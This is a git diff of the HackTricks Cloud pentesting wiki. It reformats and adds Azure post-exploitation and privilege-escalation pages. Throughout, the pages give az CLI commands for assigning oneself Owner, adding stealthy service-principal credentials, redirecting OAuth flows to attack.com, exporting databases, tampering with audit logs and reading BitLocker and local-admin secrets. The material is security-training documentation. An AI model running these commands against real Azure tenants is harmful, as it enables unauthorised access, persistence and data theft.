-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md
similarity index 62%
rename from pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md
rename to src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md
index 33de6ffd5..905e50bb1 100644
--- a/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md
@@ -1,32 +1,19 @@
 # Az - SQL Database Post Exploitation
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## SQL Database Post Exploitation
+
 For more information about SQL Database check:
 
-{% content-ref url="../az-services/az-sql-database.md" %}
-[az-sql-database.md](../az-services/az-sql-database.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-services/az-sql.md
+{{#endref}}
 
 ### "Microsoft.Sql/servers/databases/read", "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/databases/write"
 
 With these permissions, an attacker can create and update databases within the compromised environment. This post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions.
 
-{% code overflow="wrap" %}
 ```bash
 # Create Database
 az sql db create --resource-group  --server  --name 
@@ -34,13 +21,11 @@ az sql db create --resource-group  --server  --name
 # Update Database
 az sql db update --resource-group  --server  --name  --max-size 
 ```
-{% endcode %}
 
 ### "Microsoft.Sql/servers/elasticPools/write" && "Microsoft.Sql/servers/elasticPools/read"
 
 With these permissions, an attacker can create and update elasticPools within the compromised environment. This post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions.
 
-{% code overflow="wrap" %}
 ```bash
 # Create Elastic Pool
 az sql elastic-pool create \
@@ -58,13 +43,11 @@ az sql elastic-pool update \
     --dtu  \
     --tags 
 ```
-{% endcode %}
 
 ### "Microsoft.Sql/servers/auditingSettings/read" && "Microsoft.Sql/servers/auditingSettings/write"
 
 With this permission, you can modify or enable auditing settings on an Azure SQL Server. This could allow an attacker or authorized user to manipulate audit configurations, potentially covering tracks or redirecting audit logs to a location under their control. This can hinder security monitoring or enable it to keep track of the actions. NOTE: To enable auditing for an Azure SQL Server using Blob Storage, you must attach a storage account where the audit logs can be saved.
 
-{% code overflow="wrap" %}
 ```bash
 az sql server audit-policy update \
   --server  \
@@ -73,26 +56,22 @@ az sql server audit-policy update \
   --storage-account  \
   --retention-days 7
 ```
-{% endcode %}
 
 ### "Microsoft.Sql/locations/connectionPoliciesAzureAsyncOperation/read", "Microsoft.Sql/servers/connectionPolicies/read" && "Microsoft.Sql/servers/connectionPolicies/write"
 
 With this permission, you can modify the connection policies of an Azure SQL Server. This capability can be exploited to enable or change server-level connection settings
 
-{% code overflow="wrap" %}
 ```bash
 az sql server connection-policy update \
   --server  \
   --resource-group  \
   --connection-type 
 ```
-{% endcode %}
 
 ### "Microsoft.Sql/servers/databases/export/action"
 
 With this permission, you can export a database from an Azure SQL Server to a storage account. An attacker or authorized user with this permission can exfiltrate sensitive data from the database by exporting it to a location they control, posing a significant data breach risk. It is important to know the storage key to be able to perform this.
 
-{% code overflow="wrap" %}
 ```bash
 az sql db export \
   --server  \
@@ -104,13 +83,11 @@ az sql db export \
   --admin-password 
 
 ```
-{% endcode %}
 
 ### "Microsoft.Sql/servers/databases/import/action"
 
 With this permission, you can import a database into an Azure SQL Server. An attacker or authorized user with this permission can potentially upload malicious or manipulated databases. This can lead to gaining control over sensitive data or by embedding harmful scripts or triggers within the imported database. Additionaly you can import it to your own server in azure. Note: The server must allow Azure services and resources to access the server.
 
-{% code overflow="wrap" %}
 ```bash
 az sql db import --admin-user  \
 --admin-password  \
@@ -121,20 +98,5 @@ az sql db import --admin-user  \
 --storage-key  \
 --storage-uri "https://.blob.core.windows.net/bacpac-container/MyDatabase.bacpac"
 ```
-{% endcode %}
 
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md
new file mode 100644
index 000000000..cdc688716
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md
@@ -0,0 +1,64 @@
+# Az - Table Storage Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Table Storage Post Exploitation
+
+For more information about table storage check:
+
+{{#ref}}
+../az-services/az-table-storage.md
+{{#endref}}
+
+### Microsoft.Storage/storageAccounts/tableServices/tables/entities/read
+
+A principal with this permission will be able to **list** the tables inside a table storage and **read the info** which might contain **sensitive information**.
+
+```bash
+# List tables
+az storage table list --auth-mode login --account-name 
+
+# Read table (top 10)
+az storage entity query \
+    --account-name  \
+    --table-name  \
+    --auth-mode login \
+    --top 10
+```
+
+### Microsoft.Storage/storageAccounts/tableServices/tables/entities/write | Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action | Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action
+
+A principal with this permission will be able to **write and overwrite entries in tables** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some trusted data that could abuse some injection vulnerability in the app using it).
+
+- The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/write` allows all the actions.
+- The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action` allows to **add** entries
+- The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action` allows to **update** existing entries
+
+```bash
+# Add
+az storage entity insert \
+  --account-name  \
+  --table-name  \
+  --auth-mode login \
+  --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
+
+# Replace
+az storage entity replace \
+  --account-name  \
+  --table-name  \
+  --auth-mode login \
+  --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
+
+# Update
+az storage entity merge \
+  --account-name  \
+  --table-name  \
+  --auth-mode login \
+  --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
+```
+
+### \*/delete
+
+This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md
similarity index 61%
rename from pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md
rename to src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md
index 08e4f5319..555db9897 100644
--- a/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md
@@ -1,27 +1,14 @@
 # Az - VMs & Network Post Exploitation
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## VMs & Network
 
 For more info about Azure VMs and networking check the following page:
 
-{% content-ref url="../az-services/vms/" %}
-[vms](../az-services/vms/)
-{% endcontent-ref %}
+{{#ref}}
+../az-services/vms/
+{{#endref}}
 
 ### VM Application Pivoting
 
@@ -84,14 +71,12 @@ az restore-point list \
 
 2. **Create a disk** from a restore point
 
-{% code overflow="wrap" %}
 ```bash
 az disk create \
   --resource-group  \
   --name  \
   --source /subscriptions//resourceGroups//providers/Microsoft.Compute/restorePointCollections//restorePoints/
 ```
-{% endcode %}
 
 3. **Attach the disk to a VM** (the attacker needs to have compromised a VM inside the account already)
 
@@ -104,8 +89,9 @@ az vm disk attach \
 
 4. **Mount** the disk and **search for sensitive info**
 
-{% tabs %}
-{% tab title="Linux" %}
+{{#tabs }}
+{{#tab name="Linux" }}
+
 ```bash
 # List all available disks
 sudo fdisk -l
@@ -117,9 +103,11 @@ sudo file -s /dev/sdX
 sudo mkdir /mnt/mydisk
 sudo mount /dev/sdX1 /mnt/mydisk
 ```
-{% endtab %}
 
-{% tab title="Windows" %}
+{{#endtab }}
+
+{{#tab name="Windows" }}
+
 #### **1. Open Disk Management**
 
 1. Right-click **Start** and select **Disk Management**.
@@ -134,16 +122,16 @@ sudo mount /dev/sdX1 /mnt/mydisk
 
 1. If the disk is not initialized, right-click and select **Initialize Disk**.
 2. Choose the partition style:
-   * **MBR** (Master Boot Record) or **GPT** (GUID Partition Table). GPT is recommended for modern systems.
+   - **MBR** (Master Boot Record) or **GPT** (GUID Partition Table). GPT is recommended for modern systems.
 
 #### **4. Create a New Volume**
 
 1. Right-click the unallocated space on the disk and select **New Simple Volume**.
 2. Follow the wizard to:
-   * Assign a drive letter (e.g., `D:`).
-   * Format the disk (choose NTFS for most cases).
-{% endtab %}
-{% endtabs %}
+   - Assign a drive letter (e.g., `D:`).
+   - Format the disk (choose NTFS for most cases).
+     {{#endtab }}
+     {{#endtabs }}
 
 ### Sensitive information in disks & snapshots
 
@@ -175,16 +163,13 @@ It might be possible to find **sensitive information inside VM extensions and VM
 
 1. **List all VM apps**
 
-{% code overflow="wrap" %}
 ```bash
 ## List all VM applications inside a gallery
 az sig gallery-application list --gallery-name  --resource-group  --output table
 ```
-{% endcode %}
 
 2. Install the extension in a VM and **search for sensitive info**
 
-{% code overflow="wrap" %}
 ```bash
 az vm application set \
    --resource-group  \
@@ -192,19 +177,5 @@ az vm application set \
    --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
    --treat-deployment-as-failure true
 ```
-{% endcode %}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/README.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md
similarity index 100%
rename from pentesting-cloud/azure-security/az-privilege-escalation/README.md
rename to src/pentesting-cloud/azure-security/az-privilege-escalation/README.md
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md
new file mode 100644
index 000000000..acb4d51bb
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md
@@ -0,0 +1,39 @@
+# Az - App Services Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## App Services
+
+For more information about Azure App services check:
+
+{{#ref}}
+../az-services/az-app-service.md
+{{#endref}}
+
+### Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read, 
+
+These permissions allows to call the following commands to get a **SSH shell** inside a web app
+
+- Direct option:
+
+```bash
+# Direct option
+az webapp ssh --name  --resource-group 
+```
+
+- Create tunnel and then connect to SSH:
+
+```bash
+az webapp create-remote-connection --name  --resource-group 
+
+## If successfull you will get a message such as:
+#Verifying if app is running....
+#App is running. Trying to establish tunnel connection...
+#Opening tunnel on port: 39895
+#SSH is available { username: root, password: Docker! }
+
+## So from that machine ssh into that port (you might need generate a new ssh session to the jump host)
+ssh root@127.0.0.1 -p 39895
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md
similarity index 52%
rename from pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md
rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md
index 804536dc3..e4572f79b 100644
--- a/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md
@@ -1,38 +1,23 @@
 # Az - Azure IAM Privesc (Authorization)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Azure IAM
 
 Fore more information check:
 
-{% content-ref url="../az-services/az-azuread.md" %}
-[az-azuread.md](../az-services/az-azuread.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-services/az-azuread.md
+{{#endref}}
 
 ### Microsoft.Authorization/roleAssignments/write
 
 This permission allows to assign roles to principals over a specific scope, allowing an attacker to escalate privileges by assigning himself a more privileged role:
 
-{% code overflow="wrap" %}
 ```bash
 # Example
 az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"
 ```
-{% endcode %}
 
 ### Microsoft.Authorization/roleDefinitions/Write
 
@@ -45,17 +30,11 @@ Create the file `role.json` with the following **content**:
   "Name": "",
   "IsCustom": true,
   "Description": "Custom role with elevated privileges",
-  "Actions": [
-    "*"
-  ],
+  "Actions": ["*"],
   "NotActions": [],
-  "DataActions": [
-    "*"
-  ],
+  "DataActions": ["*"],
   "NotDataActions": [],
-  "AssignableScopes": [
-    "/subscriptions/"
-  ]
+  "AssignableScopes": ["/subscriptions/"]
 }
 ```
 
@@ -69,11 +48,9 @@ az role definition update --role-definition role.json
 
 This permissions allows to elevate privileges and be able to assign permissions to any principal to Azure resources. It's meant to be given to Entra ID Global Administrators so they can also manage permissions over Azure resources.
 
-{% hint style="success" %}
-I think the user need to be Global Administrator in Entrad ID for the elevate call to work.
-{% endhint %}
+> [!TIP]
+> I think the user need to be Global Administrator in Entrad ID for the elevate call to work.
 
-{% code overflow="wrap" %}
 ```bash
 # Call elevate
 az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"
@@ -81,7 +58,6 @@ az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Au
 # Grant a user the Owner role
 az role assignment create --assignee "" --role "Owner" --scope "/"
 ```
-{% endcode %}
 
 ### Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write
 
@@ -89,7 +65,6 @@ This permission allows to add Federated credentials to managed identities. E.g.
 
 Example command to give access to a repo in Github to the a managed identity:
 
-{% code overflow="wrap" %}
 ```bash
 # Generic example:
 az rest --method PUT \
@@ -103,19 +78,5 @@ az rest --method PUT \
   --headers "Content-Type=application/json" \
   --body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
 ```
-{% endcode %}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
similarity index 73%
rename from pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
index 533dd93bc..c337ced69 100644
--- a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
@@ -1,23 +1,9 @@
 # Az - EntraID Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+{{#include ../../../../banners/hacktricks-training.md}}
 
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
-
-{% hint style="info" %}
-Note that **not all the granular permissions** built-in roles have in Entra ID **are elegible to be used in custom roles.**
-{% endhint %}
+> [!NOTE]
+> Note that **not all the granular permissions** built-in roles have in Entra ID **are elegible to be used in custom roles.**
 
 ## Roles
 
@@ -25,13 +11,13 @@ Note that **not all the granular permissions** built-in roles have in Entra ID *
 
 This role contains the necessary granular permissions to be able to assign roles to principals and to give more permissions to roles. Both actions could be abused to escalate privileges.
 
-* Assign role to a user:
+- Assign role to a user:
 
 ```bash
 # List enabled built-in roles
 az rest --method GET \
   --uri "https://graph.microsoft.com/v1.0/directoryRoles"
-  
+
 # Give role (Global Administrator?) to a user
 roleId=""
 userId=""
@@ -43,7 +29,7 @@ az rest --method POST \
   }"
 ```
 
-* Add more permissions to a role:
+- Add more permissions to a role:
 
 ```bash
 # List only custom roles
@@ -52,7 +38,7 @@ az rest --method GET \
 
 # Change the permissions of a custom role
 az rest --method PATCH \
-  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/" \ 
+  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/" \
   --headers "Content-Type=application/json" \
   --body '{
     "description": "Update basic properties of application registrations",
@@ -105,14 +91,12 @@ An attacker can add a redirect URI to applications that are being used by users
 
 Note that it's also possible to change the permissions the application requests in order to get more permissions, but in this case the user will need accept again the prompt asking for all the permissions.
 
-{% code overflow="wrap" %}
 ```bash
 # Get current redirect uris
 az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris"
 # Add a new redirect URI (make sure to keep the configured ones)
-az ad app update --id  --web-redirect-uris "https://original.com/callback https://attack.com/callback" 
+az ad app update --id  --web-redirect-uris "https://original.com/callback https://attack.com/callback"
 ```
-{% endcode %}
 
 ## Service Principals
 
@@ -124,18 +108,15 @@ This allows an attacker to add credentials to existing service principals. If th
 az ad sp credential reset --id  --append
 ```
 
-{% hint style="danger" %}
-The new generated password won't appear in the web console, so this could be a stealth way to maintain persistence over a service principal.\
-From the API they can be found with: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json`
-{% endhint %}
+> [!CAUTION]
+> The new generated password won't appear in the web console, so this could be a stealth way to maintain persistence over a service principal.\
+> From the API they can be found with: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json`
 
 If you get the error `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` it's because **it's not possible to modify the passwordCredentials property** of the SP and first you need to unlock it. For it you need a permission (`microsoft.directory/applications/allProperties/update`) that allows you to execute:
 
-{% code overflow="wrap" %}
 ```bash
 az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/ --body '{"servicePrincipalLockConfiguration": null}'
 ```
-{% endcode %}
 
 ### `microsoft.directory/servicePrincipals/synchronizationCredentials/manage`
 
@@ -166,9 +147,8 @@ az ad sp credential reset --id  --append
 az ad sp owner list --id 
 ```
 
-{% hint style="danger" %}
-After adding a new owner, I tried to remove it but the API responded that the DELETE method wasn't supported, even if it's the method you need to use to delete the owner. So you **can't remove owners nowadays**.
-{% endhint %}
+> [!CAUTION]
+> After adding a new owner, I tried to remove it but the API responded that the DELETE method wasn't supported, even if it's the method you need to use to delete the owner. So you **can't remove owners nowadays**.
 
 ### `microsoft.directory/servicePrincipals/disable` and `enable`
 
@@ -188,7 +168,6 @@ az ad sp update --id  --account-enabled true
 
 These permissions allow to create and get credentials for single sign-on which could allow access to third-party applications.
 
-{% code overflow="wrap" %}
 ```bash
 # Generate SSO creds for a user or a group
 spID=""
@@ -208,9 +187,8 @@ az rest --method POST \
   --headers "Content-Type=application/json" \
   --body "{\"id\": \"$credID\"}"
 ```
-{% endcode %}
 
-***
+---
 
 ## Groups
 
@@ -264,9 +242,9 @@ az rest --method PATCH \
 
 It might be possible for users to escalate privileges modifying their own properties to be added as members of dynamic groups. For more info check:
 
-{% content-ref url="dynamic-groups.md" %}
-[dynamic-groups.md](dynamic-groups.md)
-{% endcontent-ref %}
+{{#ref}}
+dynamic-groups.md
+{{#endref}}
 
 ## Users
 
@@ -282,7 +260,6 @@ az ad user update --id  --password "kweoifuh.234"
 
 This privilege allows to modify properties of the user. It's common to find dynamic groups that add users based on properties values, therefore, this permission could allow a user to set the needed property value to be a member to a specific dynamic group and escalate privileges.
 
-{% code overflow="wrap" %}
 ```bash
 #e.g. change manager of a user
 victimUser=""
@@ -291,22 +268,21 @@ az rest --method PUT \
   --uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \
   --headers "Content-Type=application/json" \
   --body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'
-  
+
 #e.g. change department of a user
 az rest --method PATCH \
   --uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
   --headers "Content-Type=application/json" \
   --body "{\"department\": \"security\"}"
 ```
-{% endcode %}
 
 ## Conditional Access Policies & MFA bypass
 
 Misconfigured conditional access policies requiring MFA could be bypassed, check:
 
-{% content-ref url="az-conditional-access-policies-mfa-bypass.md" %}
-[az-conditional-access-policies-mfa-bypass.md](az-conditional-access-policies-mfa-bypass.md)
-{% endcontent-ref %}
+{{#ref}}
+az-conditional-access-policies-mfa-bypass.md
+{{#endref}}
 
 ## Devices
 
@@ -340,9 +316,8 @@ az rest --method POST \
 
 This permission allows attackers to read the properties of the backed up local administrator account credentials for Microsoft Entra joined devices, including the password
 
-{% code overflow="wrap" %}
 ```bash
-# List deviceLocalCredentials 
+# List deviceLocalCredentials
 az rest --method GET \
   --uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"
 
@@ -351,7 +326,6 @@ deviceLC=""
 az rest --method GET \
   --uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \
 ```
-{% endcode %}
 
 ## BitlockerKeys
 
@@ -359,7 +333,6 @@ az rest --method GET \
 
 This permission allows to access BitLocker keys, which could allow an attacker to decrypt drives, compromising data confidentiality.
 
-{% code overflow="wrap" %}
 ```bash
 # List recovery keys
 az rest --method GET \
@@ -370,29 +343,15 @@ recoveryKeyId=""
 az rest --method GET \
   --uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"
 ```
-{% endcode %}
 
 ## Other Interesting permissions (TODO)
 
-* `microsoft.directory/applications/permissions/update`
-* `microsoft.directory/servicePrincipals/permissions/update`
-* `microsoft.directory/applications.myOrganization/allProperties/update`
-* `microsoft.directory/applications/allProperties/update`
-* `microsoft.directory/servicePrincipals/appRoleAssignedTo/update`
-* `microsoft.directory/applications/appRoles/update`
-* `microsoft.directory/applications.myOrganization/permissions/update`
+- `microsoft.directory/applications/permissions/update`
+- `microsoft.directory/servicePrincipals/permissions/update`
+- `microsoft.directory/applications.myOrganization/allProperties/update`
+- `microsoft.directory/applications/allProperties/update`
+- `microsoft.directory/servicePrincipals/appRoleAssignedTo/update`
+- `microsoft.directory/applications/appRoles/update`
+- `microsoft.directory/applications.myOrganization/permissions/update`
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
similarity index 67%
rename from pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
